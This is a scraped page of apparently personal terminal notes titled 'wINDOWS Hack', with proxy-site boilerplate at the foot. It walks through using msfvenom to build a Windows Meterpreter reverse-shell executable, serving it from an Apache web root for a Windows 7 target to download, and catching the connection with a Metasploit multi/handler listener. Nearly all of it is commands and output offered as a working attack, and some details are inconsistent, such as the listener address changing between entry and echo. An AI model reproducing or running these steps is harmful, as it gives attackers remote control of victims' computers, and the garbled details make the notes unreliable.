wINDOWS Hack

Download as txt, pdf, or txt
Download as txt, pdf, or txt
You are on page 1of 3

┌──(ewepc㉿EWE)-[~]

└─$ sudo su
[sudo] password for ewepc:
┌──(root㉿EWE)-[/home/ewepc]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=9999 -f
exe > /home/ewepc/Desktop/hackt/tcil.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the
payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes

┌──(root㉿EWE)-[/home/ewepc]
└─# /home/ewepc/Desktop/hackt

┌──(root㉿EWE)-[/home/ewepc/Desktop/hackt]
└─# ls
tcil.exe

┌──(root㉿EWE)-[/home/ewepc/Desktop/hackt]
└─# cp tcil.exe /var/www/html/

┌──(root㉿EWE)-[/home/ewepc/Desktop/hackt]
└─# ls
tcil.exe

┌──(root㉿EWE)-[/home/ewepc/Desktop/hackt]
└─# service apache2 start

Open new trml.....


┌──(root㉿EWE)-[/var/www/html]
└─# msfconsole
.;lxO0KXXXK0Oxl:.
,o0WMMMMMMMMMMMMMMMMMMKd,
'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
:KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
.KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
lWMMMMMMMMMMMXd:.. ..;dKMMMMMMMMMMMMo
xMMMMMMMMMMWd. .oNMMMMMMMMMMk
oMMMMMMMMMMx. dMMMMMMMMMMx
.WMMMMMMMMM: :MMMMMMMMMM,
xMMMMMMMMMo lMMMMMMMMMO
NMMMMMMMMW ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW. ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd ,0MMMMMMMMMMK;
.WMMMMMMMMMc 'OMMMMMM0,
lMMMMMMMMMMk. .kMMO'
dMMMMMMMMMMWd' ..
cWMMMMMMMMMMMNxc'. ##########
.0MMMMMMMMMMMMMMMMWc #+# #+#
;0MMMMMMMMMMMMMMMo. +:+
.dNMMMMMMMMMMMMo +#++:++#+
'oOWMMMMMMMMo +:+
.,cdkO0K; :+: :+:
:::::::+:
Metasploit

=[ metasploit v6.2.33-dev ]
+ -- --=[ 2275 exploits - 1192 auxiliary - 406 post ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]

Metasploit tip: Use the resource command to run


commands from a file
Metasploit Documentation: https://docs.metasploit.com/

msf6 > use exploit/multi/handler


[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description


---- --------------- -------- -----------

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description


---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread,
process, none)
LHOST yes The listen address (an interface may be
specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Wildcard Target

View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set LHOST 192.168.1.120


LHOST => 192.168.64.130
msf6 exploit(multi/handler) > set LPORT 9999
LPORT => 9999
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description


---- --------------- -------- -----------

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description


---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread,
process, none)
LHOST 192.168.64.130 yes The listen address (an interface may be
specified)
LPORT 9999 yes The listen port

Exploit target:

Id Name
-- ----
0 Wildcard Target

View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > exploit/ run

On win7--- search in browser (192.168.1.120/downloads)

meterpreter > help (usess)

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy